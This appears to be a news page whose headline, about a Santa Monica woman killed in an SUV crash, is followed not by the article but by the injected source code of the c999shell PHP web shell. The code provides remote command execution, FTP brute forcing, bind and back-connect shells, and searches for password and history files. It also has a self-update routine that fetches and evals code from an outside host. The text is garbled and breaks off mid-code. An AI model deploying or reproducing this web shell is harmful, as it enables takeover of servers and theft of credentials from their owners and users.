April 16, 2024 Breaking News, Latest News, and Videos

Santa Monica Woman Killed In SUV Crash While On Way To Mexico For Funeral:

$v) {if (strtoupper($k) != “GLOBALS”) {strips($arr[“$k”]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = “1.0 pre-release build #16”; //Current version //CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie(“c999sh_surl”); $surl = “”;} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(“c999sh_surl”,$surl);} else {$surl = $_REQUEST[“c999sh_surl”]; //Set this cookie for manual SURL } $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. if ($surl_autofill_include and !$_REQUEST[“c999sh_surl”]) {$include = “&”; foreach (explode(“&”,getenv(“QUERY_STRING”)) as $v) {$v = explode(“=”,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(“http://”,”https://”,”ssl://”,”ftp://”,”\”) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).”=”.urlencode($value).”&”;}}} if ($_REQUEST[“surl_autofill_include”]) {$includestr .= “surl_autofill_include=1&”;}} if (empty($surl)) { $surl = “?”.$includestr; //Self url } $surl = htmlspecialchars($surl); $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. //Authentication $login = “”; //login //DON’T FORGOT ABOUT PASSWORD!!! $pass = “”; //password $md5_pass = “”; //md5-cryped pass. if null, md5($pass) $host_allow = array(“*”); //array (“{mask}1″,”{mask}2”,…), {mask} = IP or HOST e.g. array(“192.168.0.*”,”″) $login_txt = “Restricted area”; //http-auth message. $accessdeniedmess = “c999shell v.”.$shver.”: access denied”; $gzipencode = TRUE; //Encode with gzip? $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) $c999sh_updateurl = “http://ccteam.ru/update/c999shell/”; //Update server $c999sh_sourcesurl = “http://ccteam.ru/files/c999sh_sources/”; //Sources-server $filestealth = TRUE; //if TRUE, don’t change modify- and access-time $donated_html = “

Owned by hacker
“; /* If you publish free shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array(“”); //array (“act1”,”act2,”…), if $act is in this array, display $donated_html. $curdir = “./”; //start folder //$curdir = getenv(“DOCUMENT_ROOT”); $tmpdir = “”; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) $tmpdir_log = “./”; //Directory logs of long processes (e.g. brute, scan…) $log_email = “user@host.tld”; //Default e-mail for sending logs $sort_default = “0a”; //Default sorting, 0 – number of colomn, “a”scending or “d”escending $sort_save = TRUE; //If TRUE then save sorting-position using cookies. // Registered file-types. // array( // “{action1}”=>array(“ext1″,”ext2″,”ext3”,…), // “{action2}”=>array(“ext4″,”ext5″,”ext6”,…), // … // ) $ftypes = array( “html”=>array(“html”,”htm”,”shtml”), “txt”=>array(“txt”,”conf”,”bat”,”sh”,”js”,”bak”,”doc”,”log”,”sfc”,”cfg”,”htaccess”), “exe”=>array(“sh”,”install”,”bat”,”cmd”), “ini”=>array(“ini”,”inf”), “code”=>array(“php”,”phtml”,”php3″,”php4″,”inc”,”tcl”,”h”,”c”,”cpp”,”py”,”cgi”,”pl”), “img”=>array(“gif”,”png”,”jpeg”,”jfif”,”jpg”,”jpe”,”bmp”,”ico”,”tif”,”tiff”,”avi”,”mpg”,”mpeg”), “sdb”=>array(“sdb”), “phpsess”=>array(“sess”), “download”=>array(“exe”,”com”,”pif”,”src”,”lnk”,”zip”,”rar”,”gz”,”tar”) ); // Registered executable file-types. // array( // string “command{i}”=>array(“ext1″,”ext2″,”ext3”,…), // … // ) // {command}: %f% = filename $exeftypes = array( getenv(“PHPRC”).” -q %f%” => array(“php”,”php3″,”php4″), “perl %f%” => array(“pl”,”cgi”) ); /* Highlighted files. array( i=>array({regexp},{type},{opentag},{closetag},{break}) … ) string {regexp} – regular exp. int {type}: 0 – files and folders (as default), 1 – files only, 2 – folders only string {opentag} – open html-tag, e.g. “” (default) string {closetag} – close html-tag, e.g. “” (default) bool {break} – if TRUE and found match then break */ $regxp_highlight = array( array(basename($_SERVER[“PHP_SELF”]),1,”“,”“), // example array(“config.php”,1) // example ); $safemode_diskettes = array(“a”); // This variable for disabling diskett-errors. // array (i=>{letter} …); string {letter} – letter of a drive //$safemode_diskettes = range(“a”,”z”); $hexdump_lines = 8;// lines in hex preview file $hexdump_rows = 24;// 16, 24 or 32 bytes in one line $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = “c999”; // default password for binding $bindport_port = “31373”; // default port for binding $bc_port = “31373”; // default port for back-connect $datapipe_localport = “8081”; // default port for datapipe // Command-aliases if (!$win) { $cmdaliases = array( array(“———————————————————–“, “ls -la”), array(“find all suid files”, “find / -type f -perm -04000 -ls”), array(“find suid files in current dir”, “find . -type f -perm -04000 -ls”), array(“find all sgid files”, “find / -type f -perm -02000 -ls”), array(“find sgid files in current dir”, “find . -type f -perm -02000 -ls”), array(“find config.inc.php files”, “find / -type f -name config.inc.php”), array(“find config* files”, “find / -type f -name “config*””), array(“find config* files in current dir”, “find . -type f -name “config*””), array(“find all writable folders and files”, “find / -perm -2 -ls”), array(“find all writable folders and files in current dir”, “find . -perm -2 -ls”), array(“find all service.pwd files”, “find / -type f -name service.pwd”), array(“find service.pwd files in current dir”, “find . -type f -name service.pwd”), array(“find all .htpasswd files”, “find / -type f -name .htpasswd”), array(“find .htpasswd files in current dir”, “find . -type f -name .htpasswd”), array(“find all .bash_history files”, “find / -type f -name .bash_history”), array(“find .bash_history files in current dir”, “find . -type f -name .bash_history”), array(“find all .fetchmailrc files”, “find / -type f -name .fetchmailrc”), array(“find .fetchmailrc files in current dir”, “find . -type f -name .fetchmailrc”), array(“list file attributes on a Linux second extended file system”, “lsattr -va”), array(“show opened ports”, “netstat -an | grep -i listen”) ); } else { $cmdaliases = array( array(“———————————————————–“, “dir”), array(“show opened ports”, “netstat -an”) ); } $sess_cookie = “c999shvars”; // Cookie-variable name $usefsbuff = TRUE; //Buffer-function $copy_unset = FALSE; //Remove copied files from buffer after pasting //Quick launch $quicklaunch = array( array(“Home“,$surl), array(“Back“,”#” onclick=”history.back(1)”), array(“Forward“,”#” onclick=”history.go(1)”), array(“UPDIR“,$surl.”act=ls&d=%upd&sort=%sort”), array(“Refresh“,””), array(“Search“,$surl.”act=search&d=%d”), array(“Buffer“,$surl.”act=fsbuff&d=%d”), array(“Encoder“,$surl.”act=encoder&d=%d”), array(“Tools“,$surl.”act=tools&d=%d”), array(“Proc.“,$surl.”act=processes&d=%d”), array(“FTP brute“,$surl.”act=ftpquickbrute&d=%d”), array(“Sec.“,$surl.”act=security&d=%d”), array(“SQL“,$surl.”act=sql&d=%d”), array(“PHP-code“,$surl.”act=eval&d=%d”), array(“Update“,$surl.”act=update&d=%d”), array(“Feedback“,$surl.”act=feedback&d=%d”), array(“Self remove“,$surl.”act=selfremove”), array(“Logout“,”#” onclick=”if (confirm(‘Are you sure?’)) window.close()”) ); //Highlight-code colors $highlight_background = “#c0c0c0”; $highlight_bg = “#FFFFFF”; $highlight_comment = “#6A6A6A”; $highlight_default = “#0000BB”; $highlight_html = “#1300FF”; $highlight_keyword = “#007700”; $highlight_string = “#000000”; @$f = $_REQUEST[“f”]; @extract($_REQUEST[“c999shcook”]); //END CONFIGURATION // /Next code isn’t for editing/ @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=>$v) {$tmp[] = str_replace(“*”,”.*”,preg_quote($v));} $s = “!^(“.implode(“|”,$tmp).”)$!i”; if (!preg_match($s,getenv(“REMOTE_ADDR”)) and !preg_match($s,gethostbyaddr(getenv(“REMOTE_ADDR”)))) {exit(“c999shell: Access Denied – your host (“.getenv(“REMOTE_ADDR”).”) not allow”);} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER[“PHP_AUTH_USER”] != $login) or (md5($_SERVER[“PHP_AUTH_PW”]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(” |
“,” “,$donated_html));} header(“WWW-Authenticate: Basic realm=”c999shell “.$shver.”: “.$login_txt.”””); header(“HTTP/1.0 401 Unauthorized”); exit($accessdeniedmess); } } if ($act != “img”) { $lastdir = realpath(“.”); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE[“$sess_cookie”]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data[“copy”])) {$sess_data[“copy”] = array();} if (!is_array($sess_data[“cut”])) {$sess_data[“cut”] = array();} $disablefunc = @ini_get(“disable_functions”); if (!empty($disablefunc)) { $disablefunc = str_replace(” “,””,$disablefunc); $disablefunc = explode(“,”,$disablefunc); } if (!function_exists(“c999_buff_prepare”)) { function c999_buff_prepare() { global $sess_data; global $act; foreach($sess_data[“copy”] as $k=>$v) {$sess_data[“copy”][$k] = str_replace(“”,DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data[“cut”] as $k=>$v) {$sess_data[“cut”][$k] = str_replace(“”,DIRECTORY_SEPARATOR,realpath($v));} $sess_data[“copy”] = array_unique($sess_data[“copy”]); $sess_data[“cut”] = array_unique($sess_data[“cut”]); sort($sess_data[“copy”]); sort($sess_data[“cut”]); if ($act != “copy”) {foreach($sess_data[“cut”] as $k=>$v) {if ($sess_data[“copy”][$k] == $v) {unset($sess_data[“copy”][$k]); }}} else {foreach($sess_data[“copy”] as $k=>$v) {if ($sess_data[“cut”][$k] == $v) {unset($sess_data[“cut”][$k]);}}} } } c999_buff_prepare(); if (!function_exists(“c999_sess_put”)) { function c999_sess_put($data) { global $sess_cookie; global $sess_data; c999_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array(“sort”,”sql_sort”) as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie(“sort”,$sort);} if (!empty($sql_sort)) {setcookie(“sql_sort”,$sql_sort);} } if (!function_exists(“str2mini”)) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) – 2; return substr($content, 0,$len).”…”.substr($content,-$len); } else {return $content;} } } if (!function_exists(“view_size”)) { function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 .” GB”;} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 .” MB”;} elseif ($size >= 1024) {$size = round($size/1024*100)/100 .” KB”;} else {$size = $size . ” B”;} return $size; } } } if (!function_exists(“fs_copy_dir”)) { function fs_copy_dir($d,$t) { $d = str_replace(“”,DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != “.”) and ($o != “..”)) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists(“fs_copy_obj”)) { function fs_copy_obj($d,$t) { $d = str_replace(“”,DIRECTORY_SEPARATOR,$d); $t = str_replace(“”,DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;} } } if (!function_exists(“fs_move_dir”)) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != “.”) and ($o != “..”)) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists(“fs_move_obj”)) { function fs_move_obj($d,$t) { $d = str_replace(“”,DIRECTORY_SEPARATOR,$d); $t = str_replace(“”,DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;} } } if (!function_exists(“fs_rmdir”)) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != “.”) and ($o != “..”)) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists(“fs_rmobj”)) { function fs_rmobj($o) { $o = str_replace(“”,DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } } if (!function_exists(“myshellexec”)) { function myshellexec($cmd) { global $disablefunc; $result = “”; if (!empty($cmd)) { if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$result); $result = join(“n”,$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,”r”))) { $result = “”; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists(“tabsort”)) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists(“view_perms”)) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = “s”;} elseif (($mode & 0x4000) === 0x4000) {$type = “d”;} elseif (($mode & 0xA000) === 0xA000) {$type = “l”;} elseif (($mode & 0x8000) === 0x8000) {$type = “-“;} elseif (($mode & 0x6000) === 0x6000) {$type = “b”;} elseif (($mode & 0x2000) === 0x2000) {$type = “c”;} elseif (($mode & 0x1000) === 0x1000) {$type = “p”;} else {$type = “?”;} $owner[“read”] = ($mode & 00400)?”r”:”-“; $owner[“write”] = ($mode & 00200)?”w”:”-“; $owner[“execute”] = ($mode & 00100)?”x”:”-“; $group[“read”] = ($mode & 00040)?”r”:”-“; $group[“write”] = ($mode & 00020)?”w”:”-“; $group[“execute”] = ($mode & 00010)?”x”:”-“; $world[“read”] = ($mode & 00004)?”r”:”-“; $world[“write”] = ($mode & 00002)? “w”:”-“; $world[“execute”] = ($mode & 00001)?”x”:”-“; if ($mode & 0x800) {$owner[“execute”] = ($owner[“execute”] == “x”)?”s”:”S”;} if ($mode & 0x400) {$group[“execute”] = ($group[“execute”] == “x”)?”s”:”S”;} if ($mode & 0x200) {$world[“execute”] = ($world[“execute”] == “x”)?”t”:”T”;} return $type.join(“”,$owner).join(“”,$group).join(“”,$world); } } if (!function_exists(“posix_getpwuid”) and !in_array(“posix_getpwuid”,$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists(“posix_getgrgid”) and !in_array(“posix_getgrgid”,$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists(“posix_kill”) and !in_array(“posix_kill”,$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists(“parse_perms”)) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = “s”;} elseif (($mode & 0x4000) === 0x4000) {$t = “d”;} elseif (($mode & 0xA000) === 0xA000) {$t = “l”;} elseif (($mode & 0x8000) === 0x8000) {$t = “-“;} elseif (($mode & 0x6000) === 0x6000) {$t = “b”;} elseif (($mode & 0x2000) === 0x2000) {$t = “c”;} elseif (($mode & 0x1000) === 0x1000) {$t = “p”;} else {$t = “?”;} $o[“r”] = ($mode & 00400) > 0; $o[“w”] = ($mode & 00200) > 0; $o[“x”] = ($mode & 00100) > 0; $g[“r”] = ($mode & 00040) > 0; $g[“w”] = ($mode & 00020) > 0; $g[“x”] = ($mode & 00010) > 0; $w[“r”] = ($mode & 00004) > 0; $w[“w”] = ($mode & 00002) > 0; $w[“x”] = ($mode & 00001) > 0; return array(“t”=>$t,”o”=>$o,”g”=>$g,”w”=>$w); } } if (!function_exists(“parsesort”)) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != “d”) {$second = “a”;} return array($one,$second); } } if (!function_exists(“view_perms_color”)) { function view_perms_color($o) { if (!is_readable($o)) {return ““.view_perms(fileperms($o)).”“;} elseif (!is_writable($o)) {return ““.view_perms(fileperms($o)).”“;} else {return ““.view_perms(fileperms($o)).”“;} } } if (!function_exists(“c999getsource”)) { function c999getsource($fn) { global $c999sh_sourcesurl; $array = array( “c999sh_bindport.pl” => “c999sh_bindport_pl.txt”, “c999sh_bindport.c” => “c999sh_bindport_c.txt”, “c999sh_backconn.pl” => “c999sh_backconn_pl.txt”, “c999sh_backconn.c” => “c999sh_backconn_c.txt”, “c999sh_datapipe.pl” => “c999sh_datapipe_pl.txt”, “c999sh_datapipe.c” => “c999sh_datapipe_c.txt”, ); $name = $array[$fn]; if ($name) {return file_get_contents($c999sh_sourcesurl.$name);} else {return FALSE;} } } if (!function_exists(“c999sh_getupdate”)) { function c999sh_getupdate($update = TRUE) { $url = $GLOBALS[“c999sh_updateurl”].”?version=”.urlencode(base64_encode($GLOBALS[“shver”])).”&updatenow=”.($updatenow?”1″:”0″).”&”; $data = @file_get_contents($url); if (!$data) {return “Can’t connect to update-server!”;} else { $data = ltrim($data); $string = substr($data,3,ord($data{2})); if ($data{0} == “x99” and $data{1} == “x01”) {return “Error: “.$string; return FALSE;} if ($data{0} == “x99” and $data{1} == “x02”) {return “You are using latest version!”;} if ($data{0} == “x99” and $data{1} == “x03”) { $string = explode(“x01”,$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) {return “Can’t fetch update!”;} else { $fp = fopen(__FILE__,”w”); if (!$fp) {return “Local error: can’t write update to “.__FILE__.”! You may download c999shell.php manually here.”;} else {fwrite($fp,$source); fclose($fp); return “Thanks! Updated with success.”;} } } else {return “New version are available: “.$string[1];} } elseif ($data{0} == “x99” and $data{1} == “x04”) {eval($string); return 1;} else {return “Error in protocol: segmentation failed! (“.$data.”) “;} } } } if (!function_exists(“mysql_dump”)) { function mysql_dump($set) { global $shver; $sock = $set[“sock”]; $db = $set[“db”]; $print = $set[“print”]; $nl2br = $set[“nl2br”]; $file = $set[“file”]; $add_drop = $set[“add_drop”]; $tabs = $set[“tabs”]; $onlytabs = $set[“onlytabs”]; $ret = array(); $ret[“err”] = array(); if (!is_resource($sock)) {echo(“Error: $sock is not valid resource.”);} if (empty($db)) {$db = “db”;} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir.”dump_”.getenv(“SERVER_NAME”).”_”.$db.”_”.date(“d-m-Y-H-i-s”).”.sql”; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query(“SHOW TABLES FROM “.$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = “# Dumped by c999Shell.SQL v. “.$shver.” # Home page: http://ccteam.ru # # Host settings: # MySQL version: (“.mysql_get_server_info().”) running on “.getenv(“SERVER_ADDR”).” (“.getenv(“SERVER_NAME”).”)”.” # Date: “.date(“d.m.Y H:i:s”).” # DB: “”.$db.”” #——————————————————— “; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= “DROP TABLE IF EXISTS `”.$tab.”`;n”;} // recieve query for create table structure $res = mysql_query(“SHOW CREATE TABLE `”.$tab.”`”, $sock); if (!$res) {$ret[“err”][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row[“1″].”;nn”; // recieve table variables $res = mysql_query(“SELECT * FROM `$tab`”, $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode(“`, `”, array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode(“‘, ‘”, $values); $sql = “INSERT INTO `$tab`(`”.$keys.”`) VALUES (‘”.$values.”‘);n”; $out .= $sql; } } } } } $out .= “#———————————————————————————nn”; if ($file) { $fp = fopen($file, “w”); if (!$fp) {$ret[“err”][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists(“mysql_buildwhere”)) { function mysql_buildwhere($array,$sep=” and”,$functs=array()) { if (!is_array($array)) {$array = array();} $result = “”; foreach($array as $k=>$v) { $value = “”; if (!empty($functs[$k])) {$value .= $functs[$k].”(“;} $value .= “‘”.addslashes($v).”‘”; if (!empty($functs[$k])) {$value .= “)”;} $result .= “`”.$k.”` = “.$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists(“mysql_fetch_all”)) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists(“mysql_smarterror”)) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists(“mysql_query_form”)) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = “Query was empty”;} echo “Error:
“;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo “

“; if ($tbl_struct) { echo “

“; if (($sql_query) and (!$submit)) {echo “Do you really want to”;} else {echo “SQL-Query”;} echo “:


“; foreach ($tbl_struct as $field) {$name = $field[“Field”]; echo “» “.$name.”
“;} echo “

“; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists(“mysql_create_db”)) { function mysql_create_db($db,$sock=””) { $sql = “CREATE DATABASE `”.addslashes($db).”`;”; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists(“mysql_query_parse”)) { function mysql_query_parse($query) { $query = trim($query); $arr = explode (” “,$query); /*array array() { “METHOD”=>array(output_type), “METHOD1″… … } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( “SELECT”=>array(3,1), “SHOW”=>array(2,1), “DELETE”=>array(1), “DROP”=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result[“propertions”] = $types[$op]; $result[“query”] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == “LIMIT”) { $result[“limit”] = $arr[$k+1]; $result[“limit”] = explode(“,”,$result[“limit”]); if (count($result[“limit”]) == 1) {$result[“limit”] = array(0,$result[“limit”][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return FALSE;} } } if (!function_exists(“c999fsearch”)) { function c999fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != “.” && $f != “..”) { $bool = (empty($a[“name_regexp”]) and strpos($f,$a[“name”]) !== FALSE) || ($a[“name_regexp”] and ereg($a[“name”],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a[“text”]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c999fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a[“text”])) { $r = @file_get_contents($d.$f); if ($a[“text_wwo”]) {$a[“text”] = ” “.trim($a[“text”]).” “;} if (!$a[“text_cs”]) {$a[“text”] = strtolower($a[“text”]); $r = strtolower($r);} if ($a[“text_regexp”]) {$bool = ereg($a[“text”],$r);} else {$bool = strpos(” “.$r,$a[“text”],1);} if ($a[“text_not”]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == “gofile”) {if (is_dir($f)) {$act = “ls”; $d = $f;} else {$act = “f”; $d = dirname($f); $f = basename($f);}} //Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array(“img”,”download”,”notepad”))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start(“ob_gzHandler”); echo $v; @ob_end_flush(); } } function c999shexit() { onphpshutdown(); exit; } header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”); header(“Last-Modified: “.gmdate(“D, d M Y H:i:s”).” GMT”); header(“Cache-Control: no-store, no-cache, must-revalidate”); header(“Cache-Control: post-check=0, pre-check=0”, FALSE); header(“Pragma: no-cache”); if (empty($tmpdir)) { $tmpdir = ini_get(“upload_tmp_dir”); if (is_dir($tmpdir)) {$tmpdir = “/tmp/”;} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace(“”,DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”) { $safemode = TRUE; $hsafemode = “ON (secure)“; } else {$safemode = FALSE; $hsafemode = “OFF (not secure)“;} $v = @ini_get(“open_basedir”); if ($v or strtolower($v) == “on”) {$openbasedir = TRUE; $hopenbasedir = ““.$v.”“;} else {$openbasedir = FALSE; $hopenbasedir = “OFF (not secure)“;} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv(“SERVER_SOFTWARE”); if (!ereg(“PHP/”.phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= “. PHP/”.phpversion();} $DISP_SERVER_SOFTWARE = str_replace(“PHP/”.phpversion(),”PHP/”.phpversion().”“,htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set(“highlight.bg”,$highlight_bg); //FFFFFF @ini_set(“highlight.comment”,$highlight_comment); //#FF8000 @ini_set(“highlight.default”,$highlight_default); //#0000BB @ini_set(“highlight.html”,$highlight_html); //#000000 @ini_set(“highlight.keyword”,$highlight_keyword); //#007700 @ini_set(“highlight.string”,$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><?php echo getenv("HTTP_HOST"); ?> – phpshell

!c99Shell v. !


uname -a: “,1); ?> 

“,1);} else {echo get_current_user();} ?> 


“.htmlspecialchars($b).DIRECTORY_SEPARATOR.”“; $i++; } echo ”   “; if (is_writable($d)) { $wd = TRUE; $wdt = “[ ok ]“; echo ““.view_perms(fileperms($d)).”“; } else { $wd = FALSE; $wdt = “[ Read-Only ]“; echo ““.view_perms_color($d).”“; } if (is_callable(“disk_free_space”)) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "
Free “.view_size($free).” of “.view_size($total).” (“.$free_percent.”%)“; } echo “
“; $letters = “”; if ($win) { $v = explode(“”,$d); $v = $v[0]; foreach (range(“a”,”z”) as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.”:”);} if ($bool) { $letters .= “[ “; if ($letter.”:” != $v) {$letters .= $letter;} else {$letters .= ““.$letter.”“;} $letters .= ” ] “; } } if (!empty($letters)) {echo “Detected drives: “.$letters.”
